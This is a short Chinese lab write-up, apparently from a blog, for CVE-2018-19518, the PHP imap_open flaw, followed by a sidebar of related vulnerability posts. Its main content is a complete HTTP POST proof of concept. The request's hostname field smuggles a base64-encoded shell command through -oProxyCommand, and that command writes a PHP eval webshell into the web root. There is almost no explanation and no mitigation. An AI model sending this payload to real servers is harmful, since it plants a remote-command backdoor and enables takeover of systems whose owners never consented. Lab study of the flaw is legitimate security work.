【春秋云镜】CVE-2018-19518

HMX4042025-11-04 16:11

一、靶场介绍

php imap扩展用于在PHP中执行邮件收发操作。其imap_open函数会调用rsh来连接远程shell,而debian/ubuntu中默认使用ssh来代替rsh的功能(也就是说,在debian系列系统中,执行rsh命令实际执行的是ssh命令)。

二、POC

base64编码

python 复制代码 
POST / HTTP/1.1
Host: 127.0.0.1:13440
Content-Length: 154
Cache-Control: max-age=0
Origin: http://127.0.0.1:13440
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://127.0.0.1:13440
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive

hostname=x+-oProxyCommand%3decho%09ZWNobyAnPD9waHAgZXZhbCgkX1BPU1RbImNtZCJdKTsnID4gL3Zhci93d3cvaHRtbC9hLnBocA==|base64%09-d|sh}a&username=222&password=333
相关推荐
探索宇宙真理.3 天前
Apache Tomcat RewriteValve目录遍历漏洞 | CVE-2025-55752 复现
java·经验分享·tomcat·apache·安全漏洞
探索宇宙真理.7 天前
Vite信息泄露 | CVE-2025-46565 复现&研究
经验分享·安全漏洞
探索宇宙真理.15 天前
WordPress Flex QR Code Generator文件上传 | CVE-2025-10041 复现&研究
经验分享·php·安全漏洞
探索宇宙真理.1 个月前
DedeCMS命令执行复现&研究 | CVE-2025-6335
经验分享·php·安全漏洞
sszdlbw7 个月前
BUUCTF-web刷题篇(19)
web安全·web·安全漏洞·buuctf
sszdlbw7 个月前
SSRF漏洞利用的小点总结和实战演练
web安全·web·安全漏洞
盐碱地里的木桐9 个月前
安全行业大模型SecLLM技术白皮书
网络·人工智能·安全·大模型·安全漏洞
极小狐1 年前
GitLab CVE-2024-6678、CVE-2024-8640 漏洞解决方案
gitlab·devsecops·devops·安全漏洞
廾匸07051 年前
2024上半年网络安全漏洞态势报告
安全·网络安全·安全漏洞·态势报告
热门推荐
01GitHub 镜像站点02《大数据技术原理与应用》实验报告三 熟悉HBase常用操作03UV安装并设置国内源04综合整理:pdf预览显示:你尝试预览的文件可能对你的计算机有害。如果你信任此文件以及其来源,请打开此文件以看其内容,如何解决以正常预览文件05BongoCat - 跨平台键盘猫动画工具06Linux下V2Ray安装配置指南07npm使用国内淘宝镜像的方法08jdk21下载、安装(Windows、Linux、macOS)09NVIDIA显卡驱动、CUDA、cuDNN 和 TensorRT 版本匹配指南10安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)